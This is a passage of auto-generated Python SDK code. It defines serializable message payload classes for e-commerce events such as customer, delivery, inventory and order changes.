PaymentStatusStateTransitionMessagePayloadSchema,
)
return PaymentStatusStateTransitionMessagePayloadSchema().load(data)
if data["type"] == "PaymentTransactionAdded":
from ._schemas.message import PaymentTransactionAddedMessagePayloadSchema
return PaymentTransactionAddedMessagePayloadSchema().load(data)
if data["type"] == "PaymentTransactionStateChanged":
from ._schemas.message import (
PaymentTransactionStateChangedMessagePayloadSchema,
)
return PaymentTransactionStateChangedMessagePayloadSchema().load(data)
if data["type"] == "ProductAddedToCategory":
from ._schemas.message import ProductAddedToCategoryMessagePayloadSchema
return ProductAddedToCategoryMessagePayloadSchema().load(data)
if data["type"] == "ProductCreated":
from ._schemas.message import ProductCreatedMessagePayloadSchema
return ProductCreatedMessagePayloadSchema().load(data)
if data["type"] == "ProductDeleted":
from ._schemas.message import ProductDeletedMessagePayloadSchema
return ProductDeletedMessagePayloadSchema().load(data)
if data["type"] == "ProductImageAdded":
from ._schemas.message import ProductImageAddedMessagePayloadSchema
return ProductImageAddedMessagePayloadSchema().load(data)
if data["type"] == "ProductPriceDiscountsSet":
from ._schemas.message import ProductPriceDiscountsSetMessagePayloadSchema
return ProductPriceDiscountsSetMessagePayloadSchema().load(data)
if data["type"] == "ProductPriceExternalDiscountSet":
from ._schemas.message import (
ProductPriceExternalDiscountSetMessagePayloadSchema,
)
return ProductPriceExternalDiscountSetMessagePayloadSchema().load(data)
if data["type"] == "ProductPublished":
from ._schemas.message import ProductPublishedMessagePayloadSchema
return ProductPublishedMessagePayloadSchema().load(data)
if data["type"] == "ProductRemovedFromCategory":
from ._schemas.message import ProductRemovedFromCategoryMessagePayloadSchema
return ProductRemovedFromCategoryMessagePayloadSchema().load(data)
if data["type"] == "ProductRevertedStagedChanges":
from ._schemas.message import (
ProductRevertedStagedChangesMessagePayloadSchema,
)
return ProductRevertedStagedChangesMessagePayloadSchema().load(data)
if data["type"] == "ProductSlugChanged":
from ._schemas.message import ProductSlugChangedMessagePayloadSchema
return ProductSlugChangedMessagePayloadSchema().load(data)
if data["type"] == "ProductStateTransition":
from ._schemas.message import ProductStateTransitionMessagePayloadSchema
return ProductStateTransitionMessagePayloadSchema().load(data)
if data["type"] == "ProductUnpublished":
from ._schemas.message import ProductUnpublishedMessagePayloadSchema
return ProductUnpublishedMessagePayloadSchema().load(data)
if data["type"] == "ProductVariantAdded":
from ._schemas.message import ProductVariantAddedMessagePayloadSchema
return ProductVariantAddedMessagePayloadSchema().load(data)
if data["type"] == "ProductVariantDeleted":
from ._schemas.message import ProductVariantDeletedMessagePayloadSchema
return ProductVariantDeletedMessagePayloadSchema().load(data)
if data["type"] == "ReviewCreated":
from ._schemas.message import ReviewCreatedMessagePayloadSchema
return ReviewCreatedMessagePayloadSchema().load(data)
if data["type"] == "ReviewRatingSet":
from ._schemas.message import ReviewRatingSetMessagePayloadSchema
return ReviewRatingSetMessagePayloadSchema().load(data)
if data["type"] == "ReviewStateTransition":
from ._schemas.message import ReviewStateTransitionMessagePayloadSchema
return ReviewStateTransitionMessagePayloadSchema().load(data)
if data["type"] == "ShoppingListStoreSet":
from ._schemas.message import ShoppingListStoreSetMessagePayloadSchema
return ShoppingListStoreSetMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import MessagePayloadSchema
return MessagePayloadSchema().dump(self)
class CategoryCreatedMessagePayload(MessagePayload):
category: "Category"
def __init__(self, *, category: "Category"):
self.category = category
super().__init__(type="CategoryCreated")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "CategoryCreatedMessagePayload":
from ._schemas.message import CategoryCreatedMessagePayloadSchema
return CategoryCreatedMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import CategoryCreatedMessagePayloadSchema
return CategoryCreatedMessagePayloadSchema().dump(self)
class CategorySlugChangedMessagePayload(MessagePayload):
slug: "LocalizedString"
old_slug: typing.Optional["LocalizedString"]
def __init__(
self,
*,
slug: "LocalizedString",
old_slug: typing.Optional["LocalizedString"] = None
):
self.slug = slug
self.old_slug = old_slug
super().__init__(type="CategorySlugChanged")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "CategorySlugChangedMessagePayload":
from ._schemas.message import CategorySlugChangedMessagePayloadSchema
return CategorySlugChangedMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import CategorySlugChangedMessagePayloadSchema
return CategorySlugChangedMessagePayloadSchema().dump(self)
class CustomLineItemStateTransitionMessagePayload(MessagePayload):
custom_line_item_id: str
transition_date: datetime.datetime
quantity: int
from_state: "StateReference"
to_state: "StateReference"
def __init__(
self,
*,
custom_line_item_id: str,
transition_date: datetime.datetime,
quantity: int,
from_state: "StateReference",
to_state: "StateReference"
):
self.custom_line_item_id = custom_line_item_id
self.transition_date = transition_date
self.quantity = quantity
self.from_state = from_state
self.to_state = to_state
super().__init__(type="CustomLineItemStateTransition")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "CustomLineItemStateTransitionMessagePayload":
from ._schemas.message import CustomLineItemStateTransitionMessagePayloadSchema
return CustomLineItemStateTransitionMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import CustomLineItemStateTransitionMessagePayloadSchema
return CustomLineItemStateTransitionMessagePayloadSchema().dump(self)
class CustomerAddressAddedMessagePayload(MessagePayload):
address: "Address"
def __init__(self, *, address: "Address"):
self.address = address
super().__init__(type="CustomerAddressAdded")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "CustomerAddressAddedMessagePayload":
from ._schemas.message import CustomerAddressAddedMessagePayloadSchema
return CustomerAddressAddedMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import CustomerAddressAddedMessagePayloadSchema
return CustomerAddressAddedMessagePayloadSchema().dump(self)
class CustomerAddressChangedMessagePayload(MessagePayload):
address: "Address"
def __init__(self, *, address: "Address"):
self.address = address
super().__init__(type="CustomerAddressChanged")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "CustomerAddressChangedMessagePayload":
from ._schemas.message import CustomerAddressChangedMessagePayloadSchema
return CustomerAddressChangedMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import CustomerAddressChangedMessagePayloadSchema
return CustomerAddressChangedMessagePayloadSchema().dump(self)
class CustomerAddressRemovedMessagePayload(MessagePayload):
address: "Address"
def __init__(self, *, address: "Address"):
self.address = address
super().__init__(type="CustomerAddressRemoved")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "CustomerAddressRemovedMessagePayload":
from ._schemas.message import CustomerAddressRemovedMessagePayloadSchema
return CustomerAddressRemovedMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import CustomerAddressRemovedMessagePayloadSchema
return CustomerAddressRemovedMessagePayloadSchema().dump(self)
class CustomerCompanyNameSetMessagePayload(MessagePayload):
company_name: str
def __init__(self, *, company_name: str):
self.company_name = company_name
super().__init__(type="CustomerCompanyNameSet")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "CustomerCompanyNameSetMessagePayload":
from ._schemas.message import CustomerCompanyNameSetMessagePayloadSchema
return CustomerCompanyNameSetMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import CustomerCompanyNameSetMessagePayloadSchema
return CustomerCompanyNameSetMessagePayloadSchema().dump(self)
class CustomerCreatedMessagePayload(MessagePayload):
customer: "Customer"
def __init__(self, *, customer: "Customer"):
self.customer = customer
super().__init__(type="CustomerCreated")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "CustomerCreatedMessagePayload":
from ._schemas.message import CustomerCreatedMessagePayloadSchema
return CustomerCreatedMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import CustomerCreatedMessagePayloadSchema
return CustomerCreatedMessagePayloadSchema().dump(self)
class CustomerDateOfBirthSetMessagePayload(MessagePayload):
date_of_birth: datetime.date
def __init__(self, *, date_of_birth: datetime.date):
self.date_of_birth = date_of_birth
super().__init__(type="CustomerDateOfBirthSet")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "CustomerDateOfBirthSetMessagePayload":
from ._schemas.message import CustomerDateOfBirthSetMessagePayloadSchema
return CustomerDateOfBirthSetMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import CustomerDateOfBirthSetMessagePayloadSchema
return CustomerDateOfBirthSetMessagePayloadSchema().dump(self)
class CustomerEmailChangedMessagePayload(MessagePayload):
email: str
def __init__(self, *, email: str):
self.email = email
super().__init__(type="CustomerEmailChanged")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "CustomerEmailChangedMessagePayload":
from ._schemas.message import CustomerEmailChangedMessagePayloadSchema
return CustomerEmailChangedMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import CustomerEmailChangedMessagePayloadSchema
return CustomerEmailChangedMessagePayloadSchema().dump(self)
class CustomerEmailVerifiedMessagePayload(MessagePayload):
def __init__(self):
super().__init__(type="CustomerEmailVerified")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "CustomerEmailVerifiedMessagePayload":
from ._schemas.message import CustomerEmailVerifiedMessagePayloadSchema
return CustomerEmailVerifiedMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import CustomerEmailVerifiedMessagePayloadSchema
return CustomerEmailVerifiedMessagePayloadSchema().dump(self)
class CustomerGroupSetMessagePayload(MessagePayload):
customer_group: "CustomerGroupReference"
def __init__(self, *, customer_group: "CustomerGroupReference"):
self.customer_group = customer_group
super().__init__(type="CustomerGroupSet")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "CustomerGroupSetMessagePayload":
from ._schemas.message import CustomerGroupSetMessagePayloadSchema
return CustomerGroupSetMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import CustomerGroupSetMessagePayloadSchema
return CustomerGroupSetMessagePayloadSchema().dump(self)
class CustomerPasswordUpdatedMessagePayload(MessagePayload):
#: true, if password has been updated during Customer's Password Reset workflow.
reset: bool
def __init__(self, *, reset: bool):
self.reset = reset
super().__init__(type="CustomerPasswordUpdated")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "CustomerPasswordUpdatedMessagePayload":
from ._schemas.message import CustomerPasswordUpdatedMessagePayloadSchema
return CustomerPasswordUpdatedMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import CustomerPasswordUpdatedMessagePayloadSchema
return CustomerPasswordUpdatedMessagePayloadSchema().dump(self)
class DeliveryAddedMessagePayload(MessagePayload):
delivery: "Delivery"
def __init__(self, *, delivery: "Delivery"):
self.delivery = delivery
super().__init__(type="DeliveryAdded")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "DeliveryAddedMessagePayload":
from ._schemas.message import DeliveryAddedMessagePayloadSchema
return DeliveryAddedMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import DeliveryAddedMessagePayloadSchema
return DeliveryAddedMessagePayloadSchema().dump(self)
class DeliveryAddressSetMessagePayload(MessagePayload):
delivery_id: str
address: typing.Optional["Address"]
old_address: typing.Optional["Address"]
def __init__(
self,
*,
delivery_id: str,
address: typing.Optional["Address"] = None,
old_address: typing.Optional["Address"] = None
):
self.delivery_id = delivery_id
self.address = address
self.old_address = old_address
super().__init__(type="DeliveryAddressSet")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "DeliveryAddressSetMessagePayload":
from ._schemas.message import DeliveryAddressSetMessagePayloadSchema
return DeliveryAddressSetMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import DeliveryAddressSetMessagePayloadSchema
return DeliveryAddressSetMessagePayloadSchema().dump(self)
class DeliveryItemsUpdatedMessagePayload(MessagePayload):
delivery_id: str
items: typing.List["DeliveryItem"]
old_items: typing.List["DeliveryItem"]
def __init__(
self,
*,
delivery_id: str,
items: typing.List["DeliveryItem"],
old_items: typing.List["DeliveryItem"]
):
self.delivery_id = delivery_id
self.items = items
self.old_items = old_items
super().__init__(type="DeliveryItemsUpdated")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "DeliveryItemsUpdatedMessagePayload":
from ._schemas.message import DeliveryItemsUpdatedMessagePayloadSchema
return DeliveryItemsUpdatedMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import DeliveryItemsUpdatedMessagePayloadSchema
return DeliveryItemsUpdatedMessagePayloadSchema().dump(self)
class DeliveryRemovedMessagePayload(MessagePayload):
delivery: "Delivery"
def __init__(self, *, delivery: "Delivery"):
self.delivery = delivery
super().__init__(type="DeliveryRemoved")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "DeliveryRemovedMessagePayload":
from ._schemas.message import DeliveryRemovedMessagePayloadSchema
return DeliveryRemovedMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import DeliveryRemovedMessagePayloadSchema
return DeliveryRemovedMessagePayloadSchema().dump(self)
class InventoryEntryCreatedMessagePayload(MessagePayload):
inventory_entry: "InventoryEntry"
def __init__(self, *, inventory_entry: "InventoryEntry"):
self.inventory_entry = inventory_entry
super().__init__(type="InventoryEntryCreated")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "InventoryEntryCreatedMessagePayload":
from ._schemas.message import InventoryEntryCreatedMessagePayloadSchema
return InventoryEntryCreatedMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import InventoryEntryCreatedMessagePayloadSchema
return InventoryEntryCreatedMessagePayloadSchema().dump(self)
class InventoryEntryDeletedMessagePayload(MessagePayload):
sku: str
supply_channel: "ChannelReference"
def __init__(self, *, sku: str, supply_channel: "ChannelReference"):
self.sku = sku
self.supply_channel = supply_channel
super().__init__(type="InventoryEntryDeleted")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "InventoryEntryDeletedMessagePayload":
from ._schemas.message import InventoryEntryDeletedMessagePayloadSchema
return InventoryEntryDeletedMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import InventoryEntryDeletedMessagePayloadSchema
return InventoryEntryDeletedMessagePayloadSchema().dump(self)
class InventoryEntryQuantitySetMessagePayload(MessagePayload):
old_quantity_on_stock: int
new_quantity_on_stock: int
old_available_quantity: int
new_available_quantity: int
def __init__(
self,
*,
old_quantity_on_stock: int,
new_quantity_on_stock: int,
old_available_quantity: int,
new_available_quantity: int
):
self.old_quantity_on_stock = old_quantity_on_stock
self.new_quantity_on_stock = new_quantity_on_stock
self.old_available_quantity = old_available_quantity
self.new_available_quantity = new_available_quantity
super().__init__(type="InventoryEntryQuantitySet")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "InventoryEntryQuantitySetMessagePayload":
from ._schemas.message import InventoryEntryQuantitySetMessagePayloadSchema
return InventoryEntryQuantitySetMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import InventoryEntryQuantitySetMessagePayloadSchema
return InventoryEntryQuantitySetMessagePayloadSchema().dump(self)
class LineItemStateTransitionMessagePayload(MessagePayload):
line_item_id: str
transition_date: datetime.datetime
quantity: int
from_state: "StateReference"
to_state: "StateReference"
def __init__(
self,
*,
line_item_id: str,
transition_date: datetime.datetime,
quantity: int,
from_state: "StateReference",
to_state: "StateReference"
):
self.line_item_id = line_item_id
self.transition_date = transition_date
self.quantity = quantity
self.from_state = from_state
self.to_state = to_state
super().__init__(type="LineItemStateTransition")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "LineItemStateTransitionMessagePayload":
from ._schemas.message import LineItemStateTransitionMessagePayloadSchema
return LineItemStateTransitionMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import LineItemStateTransitionMessagePayloadSchema
return LineItemStateTransitionMessagePayloadSchema().dump(self)
class OrderBillingAddressSetMessagePayload(MessagePayload):
address: typing.Optional["Address"]
old_address: typing.Optional["Address"]
def __init__(
self,
*,
address: typing.Optional["Address"] = None,
old_address: typing.Optional["Address"] = None
):
self.address = address
self.old_address = old_address
super().__init__(type="OrderBillingAddressSet")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "OrderBillingAddressSetMessagePayload":
from ._schemas.message import OrderBillingAddressSetMessagePayloadSchema
return OrderBillingAddressSetMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import OrderBillingAddressSetMessagePayloadSchema
return OrderBillingAddressSetMessagePayloadSchema().dump(self)
class OrderCreatedMessagePayload(MessagePayload):
order: "Order"
def __init__(self, *, order: "Order"):
self.order = order
super().__init__(type="OrderCreated")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "OrderCreatedMessagePayload":
from ._schemas.message import OrderCreatedMessagePayloadSchema
return OrderCreatedMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import OrderCreatedMessagePayloadSchema
return OrderCreatedMessagePayloadSchema().dump(self)
class OrderCustomLineItemDiscountSetMessagePayload(MessagePayload):
custom_line_item_id: str
discounted_price_per_quantity: typing.List["DiscountedLineItemPriceForQuantity"]
taxed_price: typing.Optional["TaxedItemPrice"]
def __init__(
self,
*,
custom_line_item_id: str,
discounted_price_per_quantity: typing.List[
"DiscountedLineItemPriceForQuantity"
],
taxed_price: typing.Optional["TaxedItemPrice"] = None
):
self.custom_line_item_id = custom_line_item_id
self.discounted_price_per_quantity = discounted_price_per_quantity
self.taxed_price = taxed_price
super().__init__(type="OrderCustomLineItemDiscountSet")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "OrderCustomLineItemDiscountSetMessagePayload":
from ._schemas.message import OrderCustomLineItemDiscountSetMessagePayloadSchema
return OrderCustomLineItemDiscountSetMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import OrderCustomLineItemDiscountSetMessagePayloadSchema
return OrderCustomLineItemDiscountSetMessagePayloadSchema().dump(self)
class OrderCustomerEmailSetMessagePayload(MessagePayload):
email: typing.Optional[str]
old_email: typing.Optional[str]
def __init__(
self,
*,
email: typing.Optional[str] = None,
old_email: typing.Optional[str] = None
):
self.email = email
self.old_email = old_email
super().__init__(type="OrderCustomerEmailSet")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "OrderCustomerEmailSetMessagePayload":
from ._schemas.message import OrderCustomerEmailSetMessagePayloadSchema
return OrderCustomerEmailSetMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import OrderCustomerEmailSetMessagePayloadSchema
return OrderCustomerEmailSetMessagePayloadSchema().dump(self)
class OrderCustomerGroupSetMessagePayload(MessagePayload):
customer_group: typing.Optional["CustomerGroupReference"]
old_customer_group: typing.Optional["CustomerGroupReference"]
def __init__(
self,
*,
customer_group: typing.Optional["CustomerGroupReference"] = None,
old_customer_group: typing.Optional["CustomerGroupReference"] = None
):
self.customer_group = customer_group
self.old_customer_group = old_customer_group
super().__init__(type="OrderCustomerGroupSet")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "OrderCustomerGroupSetMessagePayload":
from ._schemas.message import OrderCustomerGroupSetMessagePayloadSchema
return OrderCustomerGroupSetMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import OrderCustomerGroupSetMessagePayloadSchema
return OrderCustomerGroupSetMessagePayloadSchema().dump(self)
class OrderCustomerSetMessagePayload(MessagePayload):
customer: typing.Optional["CustomerReference"]
customer_group: typing.Optional["CustomerGroupReference"]
old_customer: typing.Optional["CustomerReference"]
old_customer_group: typing.Optional["CustomerGroupReference"]
def __init__(
self,
*,
customer: typing.Optional["CustomerReference"] = None,
customer_group: typing.Optional["CustomerGroupReference"] = None,
old_customer: typing.Optional["CustomerReference"] = None,
old_customer_group: typing.Optional["CustomerGroupReference"] = None
):
self.customer = customer
self.customer_group = customer_group
self.old_customer = old_customer
self.old_customer_group = old_customer_group
super().__init__(type="OrderCustomerSet")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "OrderCustomerSetMessagePayload":
from ._schemas.message import OrderCustomerSetMessagePayloadSchema
return OrderCustomerSetMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import OrderCustomerSetMessagePayloadSchema
return OrderCustomerSetMessagePayloadSchema().dump(self)
class OrderDeletedMessagePayload(MessagePayload):
order: "Order"
def __init__(self, *, order: "Order"):
self.order = order
super().__init__(type="OrderDeleted")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "OrderDeletedMessagePayload":
from ._schemas.message import OrderDeletedMessagePayloadSchema
return OrderDeletedMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import OrderDeletedMessagePayloadSchema
return OrderDeletedMessagePayloadSchema().dump(self)
class OrderDiscountCodeAddedMessagePayload(MessagePayload):
discount_code: "DiscountCodeReference"
def __init__(self, *, discount_code: "DiscountCodeReference"):
self.discount_code = discount_code
super().__init__(type="OrderDiscountCodeAdded")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "OrderDiscountCodeAddedMessagePayload":
from ._schemas.message import OrderDiscountCodeAddedMessagePayloadSchema
return OrderDiscountCodeAddedMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import OrderDiscountCodeAddedMessagePayloadSchema
return OrderDiscountCodeAddedMessagePayloadSchema().dump(self)
class OrderDiscountCodeRemovedMessagePayload(MessagePayload):
discount_code: "DiscountCodeReference"
def __init__(self, *, discount_code: "DiscountCodeReference"):
self.discount_code = discount_code
super().__init__(type="OrderDiscountCodeRemoved")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "OrderDiscountCodeRemovedMessagePayload":
from ._schemas.message import OrderDiscountCodeRemovedMessagePayloadSchema
return OrderDiscountCodeRemovedMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import OrderDiscountCodeRemovedMessagePayloadSchema
return OrderDiscountCodeRemovedMessagePayloadSchema().dump(self)
class OrderDiscountCodeStateSetMessagePayload(MessagePayload):
discount_code: "DiscountCodeReference"
state: "DiscountCodeState"
old_state: typing.Optional["DiscountCodeState"]
def __init__(
self,
*,
discount_code: "DiscountCodeReference",
state: "DiscountCodeState",
old_state: typing.Optional["DiscountCodeState"] = None
):
self.discount_code = discount_code
self.state = state
self.old_state = old_state
super().__init__(type="OrderDiscountCodeStateSet")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "OrderDiscountCodeStateSetMessagePayload":
from ._schemas.message import OrderDiscountCodeStateSetMessagePayloadSchema
return OrderDiscountCodeStateSetMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import OrderDiscountCodeStateSetMessagePayloadSchema
return OrderDiscountCodeStateSetMessagePayloadSchema().dump(self)
class OrderEditAppliedMessagePayload(MessagePayload):
edit: "OrderEditReference"
result: "OrderEditApplied"
def __init__(self, *, edit: "OrderEditReference", result: "OrderEditApplied"):
self.edit = edit
self.result = result
super().__init__(type="OrderEditApplied")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "OrderEditAppliedMessagePayload":
from ._schemas.message import OrderEditAppliedMessagePayloadSchema
return OrderEditAppliedMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import OrderEditAppliedMessagePayloadSchema
return OrderEditAppliedMessagePayloadSchema().dump(self)
class OrderImportedMessagePayload(MessagePayload):
order: "Order"
def __init__(self, *, order: "Order"):
self.order = order
super().__init__(type="OrderImported")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "OrderImportedMessagePayload":
from ._schemas.message import OrderImportedMessagePayloadSchema
return OrderImportedMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import OrderImportedMessagePayloadSchema
return OrderImportedMessagePayloadSchema().dump(self)
class OrderLineItemAddedMessagePayload(MessagePayload):
line_item: "LineItem"
added_quantity: int
def __init__(self, *, line_item: "LineItem", added_quantity: int):
self.line_item = line_item
self.added_quantity = added_quantity
super().__init__(type="OrderLineItemAdded")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "OrderLineItemAddedMessagePayload":
from ._schemas.message import OrderLineItemAddedMessagePayloadSchema
return OrderLineItemAddedMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import OrderLineItemAddedMessagePayloadSchema
return OrderLineItemAddedMessagePayloadSchema().dump(self)
class OrderLineItemDiscountSetMessagePayload(MessagePayload):
line_item_id: str
discounted_price_per_quantity: typing.List["DiscountedLineItemPriceForQuantity"]
total_price: "Money"
taxed_price: typing.Optional["TaxedItemPrice"]
def __init__(
self,
*,
line_item_id: str,
discounted_price_per_quantity: typing.List[
"DiscountedLineItemPriceForQuantity"
],
total_price: "Money",
taxed_price: typing.Optional["TaxedItemPrice"] = None
):
self.line_item_id = line_item_id
self.discounted_price_per_quantity = discounted_price_per_quantity
self.total_price = total_price
self.taxed_price = taxed_price
super().__init__(type="OrderLineItemDiscountSet")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "OrderLineItemDiscountSetMessagePayload":
from ._schemas.message import OrderLineItemDiscountSetMessagePayloadSchema
return OrderLineItemDiscountSetMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import OrderLineItemDiscountSetMessagePayloadSchema
return OrderLineItemDiscountSetMessagePayloadSchema().dump(self)
class OrderPaymentStateChangedMessagePayload(MessagePayload):
payment_state: "PaymentState"
old_payment_state: typing.Optional["PaymentState"]
def __init__(
self,
*,
payment_state: "PaymentState",
old_payment_state: typing.Optional["PaymentState"] = None
):
self.payment_state = payment_state
self.old_payment_state = old_payment_state
super().__init__(type="OrderPaymentStateChanged")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "OrderPaymentStateChangedMessagePayload":
from ._schemas.message import OrderPaymentStateChangedMessagePayloadSchema
return OrderPaymentStateChangedMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import OrderPaymentStateChangedMessagePayloadSchema
return OrderPaymentStateChangedMessagePayloadSchema().dump(self)
class OrderReturnInfoAddedMessagePayload(MessagePayload):
return_info: "ReturnInfo"
def __init__(self, *, return_info: "ReturnInfo"):
self.return_info = return_info
super().__init__(type="ReturnInfoAdded")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "OrderReturnInfoAddedMessagePayload":
from ._schemas.message import OrderReturnInfoAddedMessagePayloadSchema
return OrderReturnInfoAddedMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import OrderReturnInfoAddedMessagePayloadSchema
return OrderReturnInfoAddedMessagePayloadSchema().dump(self)
class OrderReturnShipmentStateChangedMessagePayload(MessagePayload):
return_item_id: str
return_shipment_state: "ReturnShipmentState"
def __init__(
self, *, return_item_id: str, return_shipment_state: "ReturnShipmentState"
):
self.return_item_id = return_item_id
self.return_shipment_state = return_shipment_state
super().__init__(type="OrderReturnShipmentStateChanged")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "OrderReturnShipmentStateChangedMessagePayload":
from ._schemas.message import (
OrderReturnShipmentStateChangedMessagePayloadSchema,
)
return OrderReturnShipmentStateChangedMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import (
OrderReturnShipmentStateChangedMessagePayloadSchema,
)
return OrderReturnShipmentStateChangedMessagePayloadSchema().dump(self)
class OrderShipmentStateChangedMessagePayload(MessagePayload):
shipment_state: "ShipmentState"
old_shipment_state: typing.Optional["ShipmentState"]
def __init__(
self,
*,
shipment_state: "ShipmentState",
old_shipment_state: typing.Optional["ShipmentState"] = None
):
self.shipment_state = shipment_state
self.old_shipment_state = old_shipment_state
super().__init__(type="OrderShipmentStateChanged")
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "OrderShipmentStateChangedMessagePayload":
from ._schemas.message import OrderShipmentStateChangedMessagePayloadSchema
return OrderShipmentStateChangedMessagePayloadSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import OrderShipmentStateChangedMessagePayloadSchema
return OrderShipmentStateChangedMessagePayloadSchema().dump(self)
class OrderShippingAddressSetMessagePayload(MessagePayload):
address: typing.Optional["Address"]
old_address: typing.Optional["Address"]
def __init__(
self,
*,
address: typing.Optional["Address"] = None,
old_address: typing.Optional["Address"] = None
):
self.address = address
self.old_address = old_address
super().__init__(type="OrderShippingAddressSet")
@classmethod
